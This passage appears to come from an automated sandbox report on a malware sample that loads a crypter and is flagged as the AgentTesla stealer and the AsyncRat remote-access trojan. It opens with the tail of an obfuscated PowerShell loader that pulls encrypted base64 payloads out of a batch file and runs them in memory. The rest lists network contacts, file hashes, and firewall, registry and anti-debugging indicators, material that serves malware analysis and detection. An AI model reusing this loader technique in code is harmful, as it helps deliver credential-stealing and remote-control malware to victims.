$IrdKD=$qvAaV.EntryPoint; $IrdKD.Invoke($null, $param2_var);}$sNNem = 'C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat';$host.UI.RawUI.WindowTitle = $sNNem;$GQSoU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sNNem).Split([Environment]::NewLine);foreach ($pSNpQ in $GQSoU) { if ($pSNpQ.StartsWith('kxXxWsMoTNZTGgOQLuIn')) { $WGRDh=$pSNpQ.Substring(20); break; }}$payloads_var=[string[]]$WGRDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://hackforums.net/member.php?action=profile&uid=5420967

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2752 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 keyauth.win udp
US 104.26.1.5:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.152:80 apps.identrust.com tcp
US 8.8.8.8:53 hackforums.net udp
US 104.23.128.79:443 hackforums.net tcp
US 104.23.128.79:443 hackforums.net tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2348-0-0x000007FEF52D3000-0x000007FEF52D4000-memory.dmp

memory/2348-1-0x00000000001D0000-0x0000000000BE8000-memory.dmp

memory/2348-2-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat

MD5 9a3a9a5ba169eda2919b26e78abe3718
SHA1 ef2136796b2f2c88a9826968e14a72d34faff667
SHA256 2c7178b4b84c0c6c8e16495b665aa5f1ed22982e13fe1769feada527be6caefe
SHA512 e0a70678715e4a8679673b1a99c2850769a34a00803f8ba25b40651c557fe770af94a5c60bdb4c33c33e664d3f4cd029e0e63ecb3c8ccd49a2d508dc92f43829

\Users\Admin\AppData\Local\Temp\DeathCrypter.exe

MD5 88575400ce1bd139f89d3a66aaf8e83d
SHA1 ccf33a9f0002cbcf11bc1db4f39b382d083d120a
SHA256 2fd42ebaabde3fd44429da6f803ca202a543208be7ec1162360375504ccf2c63
SHA512 c9b2e316b4b372a93191745ae38cffc7b99b857c3bea52766fa3063edc88bd7ba4fba5cfd40178a0fecb43f322b29b249f5bd15cb6df3b2836931cba30b3f46d

memory/2588-18-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

memory/2588-19-0x000000013F220000-0x0000000140796000-memory.dmp

memory/2260-25-0x0000000002820000-0x0000000002828000-memory.dmp

memory/2260-24-0x000000001B4B0000-0x000000001B792000-memory.dmp

memory/2588-26-0x0000000000540000-0x0000000000541000-memory.dmp

memory/2348-27-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

memory/2588-28-0x000000001CD10000-0x000000001CF22000-memory.dmp

memory/2588-29-0x000000001C740000-0x000000001C8B2000-memory.dmp

memory/2588-30-0x000000001C200000-0x000000001C2B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3D22.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar3E22.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 548346ffcf12cb0477b8e524e18d989a
SHA1 1f4e7529b6340a8b653c3c3a5a12a9106951904f
SHA256 8ba9a52a4c88e5c2b7f27175a250161a5b54250b2ccd28919009dd1d00d6e9ba
SHA512 7d3b4f6ed9edd513b77cc9cb842b7439614f07da64ff190753a0b037a9d3aa2454cea5767922cfea0f1f9ff90a9ade775f08f6237e769c1fd328b24958f9cc63

memory/2588-98-0x0000000020790000-0x0000000020A36000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 743a25e3ea577d4da3f1f548215b5d0a
SHA1 101afefb782683f71107680f0fa747445ee22d25
SHA256 e346878edf6ddbb614e835b33f53f5d6583dba6b232e826e8704adf224c23e4d
SHA512 09edb8400fea5515025309fa44095d313d8649aa43d677ed0f00a0c6dd7117e5881e6af4630247818ae41e8fe5402c595c80c22d276252c3aa55f2b66a0ea43e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0579157b1be963ebcdcbc1c5925b2e8e
SHA1 83b40e83e877bb62838f7af21ab87a4123368fcf
SHA256 0a7be9189dee7bfa14ae54420fee586bd06324ec2321131bd36475ca37d90a22
SHA512 bd8012391dc8b4f0d3b55728841c16318941dc29e36f4679d8efcd6f4ac857a72c95aa34d1e7e0b97b1011c941373701ee3154da53437d51400ae02591dd12d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5def6287ded0354d8cdbd575cc37eec
SHA1 1f6c9464d11fd1f8efebc697471783d6f6ea7edf
SHA256 0372da98a87bbd165cad3a4eb570488b1de7f86e58bb93b1e3cedf816a4af4e1
SHA512 671dac13c8ab189400e88c23be74ad7ad57bdc5c3aab9ea2ca36bf2b154633b604b7a9de82e1f8b2a36617b9c7df795e63e88e6243c4bb4b5ac20713c5fd062b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1d709f0e606faf70c9d1d60df474207d
SHA1 3fdbdb1eed6ac2cf085e96faf19c5205c03f99d7
SHA256 aa84a4876d6d80758b7466531e1de084d08134bdd2bc8b7a161db6476e407010
SHA512 492ad592abe0d14843ab7b17f4f14c062a3b09072fb912d079075254d23028ec8df7e2a3ae33b9706658e7e424103400e77144ba2abc1974bc265d2f696013c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5660f0c1aa5a543902a6406c27a40d6c
SHA1 80736d8292187d29fb8211205c6c7bc7ed66ac84
SHA256 4cb338fbad0dfd381a03df78ab9062eb12422fba0344c045a02116ca0ab756be
SHA512 e3e2efc08eda61700ccf202b3f7f416715343aa649d756987f7531f7f75660c9195c712f7860a964ebefe8815e32026fba34a638090013340c2ac012d44bf724

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8ba59ae7cf6a1cbcc0768d8fe998da58
SHA1 5c5b7dd17a1af40b9d3162260ae5b60ee84fe71b
SHA256 3acf327cfae00b8f5c55ec504a900b7f8d554480c03077735cd28f30614f04f8
SHA512 ed8ddaccd43b59a0a6dadc5b1a07364ce9d16351b53a8f95379bbe4a00bcd992cd98a6943bea519de5d184f1b994e5967d3535a41404f7739df895574537dfb9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cbad8c0d009abd309567e7a30cd01386
SHA1 fe13ed222fb41df456658ac755ee66f37be4fb50
SHA256 0fec598c3a4b7a608dce2ebd121da0019cc50e61af39c673625d3932f96264c6
SHA512 d1f7da4962eeaa177c8cf70f2f983625142d32aa23201ab9437debcfa6059a530cb0aca394f5422c551dad177fa383449413d07f7ca250b631d4c0b0bdae5bc3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3dcfc06c04964a79275b04c9123b8314
SHA1 1dae60cf4e98cfe0f528b5ee3d1529865e097733
SHA256 e3026e36606fab5aeb195044308c391219e9e0653657e4816ba5fdf1a8c0c2ee
SHA512 b65d9e79e405af6815ac3f756c5b07b0c113e7197f3060c836eb3a2cccc87f73cbec148b0ccd75fbf2c4b896848dbca59814d58b1354510ebdcbfb146839e8a9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7c0fef07cc1f35af6bb0cece6eb6f59
SHA1 f1085177812f0bbf59d434e6d37a37b0e2cb6973
SHA256 b6474cb1f326a5f0793f3af292342669ac4ec60700edb64ac39d05192f129551
SHA512 e2c8ddc3be3190367f4e70a763f35f81ed986a656355486c90e42a3b4045717d5a7cfc192a8c65a581584ecc8d67f4cc8d2a0fd4f9f5b9c4d4ee304e785cfa74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9eeca0a30a5a9ac39430ee4a929a5893
SHA1 01a8d0f09b9f8184a5a48898bcf0f64b1f46d0af
SHA256 274175b5216ac8e42605de3141e3235a96405a293769290add5bdf23f305ece4
SHA512 542f8dfa5abd49d4de673f62cbfe58088c97f81398a4abbaf3ee2ca55547f2c18abb74be7c6348fa155809213b060665c5796a63547788e51254f8ab8ebf4831

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 edd4792ef25624c4f7b980460a6af796
SHA1 5676087bb9d3463c8adbc8caa0c7873fcfb5f478
SHA256 4ffc0470e0f1fc7465555cb04a0e4e9ccec6aee1da6caf4740bb683216c6efc2
SHA512 996d2e83c2043954368c64c543330876006d2d85e5fda79a1199c681aba052e5a14e0f774457b899899339a83b5c7d211008cbe48f3cabab29a0f1b74ea5640f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4dfd7bc748b723371e9484672afe6d96
SHA1 f2cdb3021e430c12246c84f44011840600d7ba00
SHA256 b371ed87d162601bdc253f38f15d668b05fee39e56fd8c1df69f803dd95ace21
SHA512 ae3c4ca4b454a9e901fa27bbe9b39efa30a8f26ac05f3342277e2b7d38d098e16d1e498fde531df38a10bdc1efa850fe38364041a2b05d3cc4b6166e059e3677

memory/2588-587-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56f55c3f4f1b67348f6cceb713dda9c1
SHA1 40f4fa0486fb07d92a9c6ee312b05ae22ca15f27
SHA256 a67f7f035dbafbb201e568f3f7c75bcfb5c305fe5f8bb933e0b0314c54cdb7f2
SHA512 7edc4b36e44b8ce659f3fbc784e3b32c8fee16e1285ed94add31366bbb67bd87a5301bd9cb4206b517c6c54cbbd1ce3d5057cc3c6521ef9d4ffd30b88b438b5e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c97fc97ac57f1331de4efb5c5b3aaa0e
SHA1 03e57aa47a3073932fd66366b0720c388164640f
SHA256 89b4a6059ccdec0a7d6acb6af60d9d62c5989aea373fc966056ee781c1b436b1
SHA512 4c590c590c3e1fdd10bcefbab03a670c84a75133fb5c6a74f533f229c5dc5386436d8ce22a6b052cf5e124dd72032d8a1373f49cb95f44b385cf449f9c91b86e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a0667f06c144c6c719c75a9b7ac402cf
SHA1 c24efa98c086d28946137556f7325b0862f8efdd
SHA256 5f96fbf8c6c1fe717cf3dcc7d6206c70d7e9f1a6f60173562674a3c7ea6ae101
SHA512 6220d4264497ad22f071d068fde032c94d8938abb56403846d536948bcd9f43f818ebd34d6ad504381167c0b1f21f518b9590134d22c874f6bfef649df953dde

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aba93041422b29fbfa1b08565b28cb79
SHA1 82b305a93599cec172ca06acc4643ef51f1841df
SHA256 8c9ca3f4f45302510c1b4303f9055243560994ec01bf87709b86a16baa60e6c3
SHA512 2469744e5bcaaf219a25838df1c9510cd0ecdb4ba3f5d66ebb75ce753dd84e5fac799543a9e9cd24ef0ac1b66e133a2662efa640494d9af906927f522fc35d4e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c234b8652589feec8db6d7d610024ca
SHA1 ad662e4153affd76e1f7d9f5eb38653cb5026b85
SHA256 e403ed426d9d9ac8c886761846856fe2e2edf02f3074c2dd2e622a64a203a511
SHA512 92adec16445036af0dd2d6cb47bd0ebdd438e31d5cc9e028eeebb45a53a86ccaaf4a9119eb1a9f05a7031298512c4b8dac07bcd6a2ec2588150aa2f3f43fb10f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 be5dc3aa3a6dd0faabc759bf6963963e
SHA1 45df723c69a8be1ba3ea3dac33843d63be9d5ff4
SHA256 d17fd7e18b9bbedf452cb5cd14a3964e6fadbd3d2cf2bcc8252ced086b176342
SHA512 b3ef47ba4744040a6e0654df261b5deedbc3593d8d9c9123cd0d345107867d2ce4130f4d91908ab3afa2f65eb019698571db29b6a860019c4b342dabcf046170

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c19470e914dbfc1aa69462ed71a293c0
SHA1 18f77dee6eb70fddab91d08b2c674027293afd15
SHA256 01ba857c11854c57f08d6669defee671aba6cc8b627981db15c0f9e365278197
SHA512 756b45f15fbbbc66b50854c8fc1d85bc59fab05351c42c40f4ccbfc8efb4dc3aa79fab9fc5d3116bf8234c426da2162ef517d6430460c8575cf653c905eab39f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 96869a25a436f4941407022ca430e4e1
SHA1 b1233b72839e3f06981a7958827dfa4f789a916a
SHA256 132838214c1589432fb60b8afee5cf342f36d5034320f53b1676779ab4d8982f
SHA512 2f89bb4aea302276c818a3bb2e6ec8dbf3d35f266082bbdcceaccf0596dc27f996562ee597400c4402190f301fd4ff8afa77e46298f1e3632785d5dfaa6033d1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 ed63157c645bf7f9e1c6c6c5a3ecc798
SHA1 bb22cc40e5c85c8db21ec56bd6df4058d47834e4
SHA256 ec395e2933b9c9832a01f40e2c13402e1fa6ed3c54ff39975c998496cf6df5bf
SHA512 c1cc2d45917f113b378ae2572e714a2a7176986d27ae9ddee1d58dcfeea4cb851c1c0925f0f3512d69320a2fc547ef23331489c2c88b643d334f42f375caef9d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8967cc8618648625be4f4d45ead3ab32
SHA1 835ca9df53b454ccca46823a62c376ee13bfbcdf
SHA256 f218ed86fbe893ba85c4de3ed61fe8621bc83f909d100a019665a7a909e0d936
SHA512 61a394f1684d8831b7089450050619ab59f3df2139b22b7b6ae8a16b6b6854e66de5f48eb056fda768e202280a1071d113fdab2153652bd6f68e5d53e99eb510

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8b49880d147d69bf0857ba7ebcf0f7ce
SHA1 8e912473a83e5fce7a59b67ce9892078677b18eb
SHA256 8cf6d02645fe285b3ffa000fbc4d4f408456db2939ca4f52845b83404b287a7b
SHA512 fcb9e2af509e5903681a2e5559ee24b32423d18b1b91500f66aec9fdac3298ac77d1be4e85095472634626e8d730d875f5ba2687d62b1474aa807b0dcd5bc7e6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1455db6d01cefdd9f73c27aea4473864
SHA1 8c15ff8cb6ef05b31d3a38334e9175d600b8e14f
SHA256 3c388c806050be3c62179940215d438ccf6b6aea4b53e9734fd16f887c99e94c
SHA512 98ac42de7849b9bbef5bb4a16b9ce3deb074b2fb0f145950a2276eb225fa4adcd1244a4b51db92c023936fb796df4f95f22ba8de59e536c9b34929b161035aaa

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-04 12:58

Reported

2024-06-04 13:00

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AsyncRat

rat asyncrat

Modifies firewall policy service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{BE5B40F9-DA1A-424C-A230-A71B4024715D} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{C7968B49-87F2-4E3D-A343-B2DEFD5269A6} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" C:\Windows\system32\svchost.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" C:\Windows\system32\svchost.exe N/A

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619796298188674" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619796296488717" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 C:\Windows\system32\svchost.exe N/A
